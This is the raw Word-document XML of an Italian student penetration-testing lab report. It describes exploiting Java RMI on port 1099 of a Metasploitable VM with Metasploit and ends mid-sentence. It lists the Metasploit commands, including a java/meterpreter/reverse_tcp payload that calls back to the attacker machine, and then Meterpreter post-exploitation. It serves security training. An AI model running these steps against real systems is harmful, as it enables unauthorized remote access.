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9FACF" w14:textId="50153959" w:rsidR="00E07436" w:rsidRPr="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Report </w:t>
      </w:r>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sullo</w:t>
      </w:r>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Sfruttamento di Vulnerabilità Java RMI su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="20AC663E" w14:textId="48F73426" w:rsidR="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00E07436">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="00E07436">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E07436">
        <w:t>Maggio</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E07436">
        <w:t xml:space="preserve"> 2025 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA7A319" w14:textId="3B68C68B" w:rsidR="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autore</w:t>
      </w:r>
      <w:r w:rsidRPr="00E07436">
        <w:t>: Stefano Gugliotta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C800010" w14:textId="4E988094" w:rsidR="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Introduzione</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DA633B" w14:textId="07745877" w:rsidR="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:r>
        <w:t xml:space="preserve">Il presente report documenta l'esecuzione di un </w:t>
      </w:r>
      <w:r>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>penetration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> testing volto a sfruttare una vulnerabilità presente nel servizio Java Remote Method </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Invocation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (RMI) in esecuzione sulla porta 1099 di una macchina virtuale </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. L'obiettivo principale era ottenere una sessione remota </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sulla macchina vittima utilizzando il framework </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> e successivamente raccogliere informazioni cruciali sulla sua configurazione di rete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D29D57F" w14:textId="191239D2" w:rsidR="00E07436" w:rsidRPr="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E0743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84D980" wp14:editId="3BD523F1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3032760</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>266065</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2994025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40" y="21443"/>
                <wp:lineTo x="21440" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="1372120859" name="Immagine 1" descr="Immagine che contiene testo, schermata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20859" name="Immagine 1" descr="Immagine che contiene testo, schermata, software&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corret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7436">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fase 1: Preparazione dell'Ambiente e Verifica della Connettività</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3503760C" w14:textId="6F8E41CA" w:rsidR="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:r>
        <w:t xml:space="preserve">Prima di procedere con l'attacco, è stata dedicata attenzione alla corretta configurazione dell'ambiente di laboratorio. La macchina attaccante, Kali Linux, è stata configurata con l'indirizzo IP statico </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>192.168.11.111</w:t>
      </w:r>
      <w:r>
        <w:t>,rimuovendo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> il vecchio </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> statico 192.168.1.25 precedentemente impostato.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F02587" w14:textId="5568A139" w:rsidR="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:r>
        <w:t xml:space="preserve">Analogamente, la macchina vittima, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, è stata impostata con l'indirizzo IP statico 192.168.11.112</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>acquisito dopo un riavvio per assicurare l'applicazione delle impostazioni, ha confermato questo indirizzo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDC9551" w14:textId="62CF15A1" w:rsidR="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="44E10AAB" wp14:editId="2835593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724530" cy="1324160"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21445"/>
                <wp:lineTo x="21449" y="21445"/>
                <wp:lineTo x="21449" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="1502208944" name="Immagine 2" descr="Immagine che contiene testo, Carattere, schermata, tipografi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08944" name="Immagine 2" descr="Immagine che contiene testo, Carattere, schermata, tipografia&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corret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312BA" w14:textId="77777777" w:rsidR="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="272B4969" wp14:editId="18CB92FE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1529080</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="619125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34" y="21268"/>
                <wp:lineTo x="21534" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="254763317" name="Immagine 3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63317" name="Immagine 3" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corret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Successivamente, è stata verificata la connettività di base tra le due macchine utilizzando il comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ping</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. L'esito positivo del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ping</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> da Kali a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> e viceversa (come documentato nello screenshot) ha assicurato che le macchine potessero comunicare a livello di rete IP, prerequisito fondamentale per le fasi successive dell'esercizio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C2F2C9" w14:textId="0BAEC03E" w:rsidR="00E07436" w:rsidRPr="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Fase 2: Identificazione della Vulnerabilità con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4FE8D85E" w14:textId="77777777" w:rsidR="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436"/>
    <w:p w14:paraId="32C175B3" w14:textId="6561CEA0" w:rsidR="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="44CD7FB2" wp14:editId="7340524F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>1562100</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>8890</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4872990" cy="2830195"/>
            <wp:effectExtent l="0" t="0" r="3810" b="8255"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21518"/>
                <wp:lineTo x="21532" y="21518"/>
                <wp:lineTo x="21532" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="437463354" name="Immagine 4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63354" name="Immagine 4" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corret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Sebbene la traccia dell'esercizio indicasse già la presenza di un servizio vulnerabile sulla porta 1099 (Java RMI), è stata eseguita una scansione di base con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> per confermare il servizio in esecuzione sulla macchina vittima. Il comando utilizzato è stato:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542AF3C6" w14:textId="3FFC5187" w:rsidR="00E07436" w:rsidRPr="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.11.112 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED6DA1C" w14:textId="798E0E04" w:rsidR="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:r>
        <w:t xml:space="preserve">Lo screenshot dell'output di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ha mostrato che un servizio, identificato come un server RMI Java, era effettivamente in ascolto sulla porta 1099 dell'indirizzo IP 192.168.11.112. Questa informazione ha confermato la presenza del target vulnerabile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637A1C37" w14:textId="77777777" w:rsidR="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436"/>
    <w:p w14:paraId="5E996516" w14:textId="4A52981B" w:rsidR="00E07436" w:rsidRPr="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fase 3: Sfruttamento della Vulnerabilità con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3DC7E78A" w14:textId="5DA21C39" w:rsidR="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="41F3469D" wp14:editId="60EA4FBD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>2766060</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>153670</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3400425" cy="2952750"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21461"/>
                <wp:lineTo x="21539" y="21461"/>
                <wp:lineTo x="21539" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="208267272" name="Immagine 5" descr="Immagine che contiene testo, schermata, menu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7272" name="Immagine 5" descr="Immagine che contiene testo, schermata, menu&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corret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600E0" w14:textId="30E791E3" w:rsidR="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:r>
        <w:t xml:space="preserve">Con la conferma del servizio vulnerabile, è stato avviato il framework </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">). All'interno della console di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, è stata utilizzata la funzionalità di ricerca per identificare gli exploit relativi a Java RMI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAF0DBE" w14:textId="77777777" w:rsidR="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> java </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>rmi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00CB09AE" w14:textId="71A2DE8F" w:rsidR="00E07436" w:rsidRPr="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lo screenshot dell'output della ricerca ha mostrato una lista di exploit potenzialmente utilizzabili. Basandosi sulla natura della vulnerabilità (un server RMI insicuro), è stato selezionato l'exploit </w:t>
      </w:r>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>exploit/multi/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>misc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>java_rmi_server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(identificato tipicamente con il numero 8 nella </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>lista). Questo exploit è noto per sfruttare configurazioni predefinite insicure nei server Java RMI che permettono l'esecuzione di codice arbitrario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76318ACA" w14:textId="150AEC9F" w:rsidR="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="72C49C23" wp14:editId="32570878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276225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451" y="21545"/>
                <wp:lineTo x="21451" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="922382796" name="Immagine 6" descr="Immagine che contiene testo, schermata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82796" name="Immagine 6" descr="Immagine che contiene testo, schermata, software&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corret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Una volta selezionato l'exploit, sono state visualizzate le sue opzioni utilizzando il comando show options. Lo screenshot di questo output ha mostrato i parametri configurabili, tra cui RHOSTS (l'indirizzo della vittima), RPORT (la porta del servizio RMI), LHOST (l'indirizzo dell'attaccante) e LPORT (la porta in ascolto sull'attaccante per la connessione reverse).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194E15CE" w14:textId="5125362E" w:rsidR="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:r>
        <w:t>Le opzioni sono state quindi configurate con i valori appropriati per il nostro ambiente di laboratorio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A73EA0" w14:textId="77777777" w:rsidR="00E07436" w:rsidRPr="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>set RHOSTS 192.168.11.112</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221A6235" w14:textId="77777777" w:rsidR="00E07436" w:rsidRPr="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>set RPORT 1099</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69365C2D" w14:textId="77777777" w:rsidR="00E07436" w:rsidRPr="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>set PAYLOAD java/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="657B0AC7" w14:textId="77777777" w:rsidR="00E07436" w:rsidRPr="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>set LHOST 192.168.11.111</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C596BBB" w14:textId="77777777" w:rsidR="00E07436" w:rsidRPr="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A56262" w14:textId="6014B707" w:rsidR="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436"/>
    <w:p w14:paraId="5DBC125B" w14:textId="77777777" w:rsidR="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:r>
        <w:t xml:space="preserve">Infine, l'exploit è stato lanciato con il comando exploit. Lo screenshot successivo ha catturato il tentativo di sfruttamento. In caso di successo, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ha stabilito una connessione con il server RMI vulnerabile e ha inviato il payload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444F7E86" w14:textId="33281E7A" w:rsidR="00E07436" w:rsidRPr="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fase 4: Raccolta delle Evidenze con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1B4A29F4" w14:textId="77600A9F" w:rsidR="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1166D828" wp14:editId="0132EE74">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3070860</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>665480</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="280035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1093101023" name="Immagine 7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01023" name="Immagine 7" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corret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 termine dello sfruttamento riuscito, è stata ottenuta una sessione </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sulla macchina vittima, come indicato dal cambio del prompt in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt;. A questo punto, sono stati eseguiti i comandi richiesti per raccogliere le evidenze:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D8F236" w14:textId="5A4E5A28" w:rsidR="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configurazione di Rete</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Il comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ipconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a seconda della configurazione di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) è stato utilizzato per visualizzare la configurazione di rete della macchina vittima. Lo screenshot dell'output di questo comando ha mostrato dettagli come l'indirizzo IP (192.168.11.112), la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>subnet</w:t>
      </w:r>
